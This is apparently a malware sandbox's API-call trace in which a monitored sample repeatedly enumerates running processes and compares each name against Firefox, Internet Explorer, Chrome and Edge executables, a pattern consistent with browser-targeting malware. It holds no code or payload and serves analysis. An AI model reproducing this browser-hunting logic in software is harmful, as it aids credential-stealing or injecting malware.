1 [0243.115] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0243.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0243.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0243.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.116] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.116] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.116] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.116] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0243.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0243.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0243.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.117] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.117] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0243.117] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0243.117] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0243.117] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.117] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.118] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.118] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.118] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.118] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.118] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.118] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0243.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0243.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0243.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.119] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.119] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0243.119] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0243.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0243.120] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.120] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.120] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.121] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.122] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0243.122] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0243.122] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0243.122] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.122] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0243.122] CloseHandle (hObject=0xd4) returned 1 [0243.122] Sleep (dwMilliseconds=0x3e8) [0244.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0244.137] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.137] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0244.137] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0244.137] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0244.137] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0244.137] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.138] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0244.138] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0244.138] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0244.138] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0244.138] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.139] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0244.139] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0244.139] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0244.139] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.139] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.139] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0244.139] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0244.139] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0244.139] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.139] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.140] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0244.140] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0244.140] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0244.140] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.140] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0244.140] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0244.140] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0244.140] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.141] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0244.141] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0244.141] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0244.141] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.141] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.141] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0244.141] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0244.141] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0244.141] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.142] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0244.142] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0244.142] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0244.142] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0244.143] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0244.143] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0244.143] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0244.143] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.143] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.143] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.143] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.143] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.144] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.145] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.146] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0244.146] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0244.146] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0244.146] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.146] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.146] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.147] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.148] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0244.148] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0244.148] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0244.148] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.148] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0244.148] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0244.148] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0244.148] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.149] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0244.149] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0244.149] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0244.149] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.149] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.149] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.149] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.149] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.150] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0244.150] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0244.150] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0244.150] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0244.150] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0244.150] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0244.150] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0244.151] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0244.151] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0244.151] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0244.151] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0244.151] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0244.152] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0244.152] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0244.152] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0244.152] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0244.152] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0244.152] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0244.152] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0244.152] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0244.153] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0244.153] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0244.153] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0244.153] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 